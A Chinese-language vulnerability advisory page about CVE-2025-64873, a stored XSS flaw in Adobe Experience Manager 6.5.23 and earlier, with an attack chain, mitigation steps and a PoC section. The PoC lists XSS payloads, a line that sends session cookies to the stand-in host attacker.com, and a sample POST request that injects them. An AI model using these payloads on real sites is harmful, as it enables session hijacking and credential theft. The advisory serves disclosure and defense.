IPBUF安全漏洞报告
English
CVE-2025-64873 CVSS 5.4 中危

CVE-2025-64873 Adobe Experience Manager存储型XSS漏洞

披露日期: 2025-12-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-64873
漏洞类型
存储型跨站脚本攻击(XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Adobe Experience Manager

相关标签

存储型XSSAdobe Experience ManagerCVE-2025-64873内容管理漏洞Web安全跨站脚本会话劫持APSB25-115

漏洞概述

CVE-2025-64873是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及更早版本,攻击者可以利用低权限账户在易受攻击的表单字段中注入恶意脚本。当受害者浏览包含该恶意字段的页面时,注入的JavaScript代码将在其浏览器中执行,可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于是存储型XSS,恶意脚本会被永久保存在服务器端,影响所有访问该页面的用户。Adobe官方已确认此漏洞并发布安全公告APSB25-115。

技术细节

该漏洞为存储型XSS(CWE-79),存在于Adobe Experience Manager的表单处理组件中。攻击者通过以下方式利用:1) 使用低权限账户登录AEM系统;2) 在支持富文本输入的表单字段中注入恶意JavaScript代码,如<img src=x onerror=alert(document.cookie)>;3) 提交表单后,恶意脚本被存储在服务器数据库中;4) 当其他用户访问包含该字段的页面时,浏览器解析HTML并执行注入的脚本。由于AEM常用于企业内容管理,攻击成功后可窃取管理员凭证、获取敏感业务数据或进行进一步横向移动。修复方案包括输入验证、输出编码和使用Content Security Policy(CSP)。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标AEM实例版本,确认版本<=6.5.23,并查找可利用的表单字段
STEP 2
步骤2: 低权限账户获取
攻击者获取AEM的低权限用户账户(可通过社工、弱口令或已有账户)
STEP 3
步骤3: 恶意脚本注入
在易受攻击的表单字段中注入存储型XSS payload,如<img src=x onerror=alert(document.cookie)>
STEP 4
步骤4: 数据持久化
提交表单后,恶意脚本被存储在AEM JCR仓库中,成为页面内容的一部分
STEP 5
步骤5: 诱导受害者访问
攻击者诱使目标用户(管理员或内容审核者)访问包含恶意脚本的页面
STEP 6
步骤6: 脚本执行与攻击完成
受害者浏览器解析页面时执行注入的JavaScript,攻击者窃取会话cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-64873 Stored XSS PoC --> <!-- Inject this payload into vulnerable form fields in Adobe Experience Manager --> <!-- Basic XSS payload --> <script>alert(document.cookie)</script> <!-- Image tag-based XSS payload --> <img src=x onerror=alert('XSS')> <!-- Event handler XSS payload --> <svg/onload=alert(document.domain)> <!-- Polyglot XSS payload --> javascript:/*--></title></style></template></select></option></script></xmp><svg/onload=alert(origin))>// <!-- Steal session cookies --> <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- To test: Submit above payload in any text field of AEM forms, then visit the page containing the stored content. --> <!-- Example API request --> POST /content/forms/af/[form-name]/jcr:content/guideContainer.json HTTP/1.1 Host: target.com Content-Type: application/json { "textField": "<img src=x onerror=alert(document.cookie)>", "name": "<script>fetch('https://attacker.com/steal?c='+btoa(document.cookie))</script>" }

影响范围

Adobe Experience Manager 6.5.23及更早版本
AEM Cloud Service (需确认官方修复版本)

防御指南

临时缓解措施
立即将Adobe Experience Manager升级到6.5.24或更高版本;临时措施包括:1)禁用非必要的表单字段富文本功能;2)对所有输出启用HTML编码;3)配置严格的CSP策略限制内联脚本执行;4)监控AEM访问日志查找可疑的XSS尝试;5)对低权限用户实施最小权限原则。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表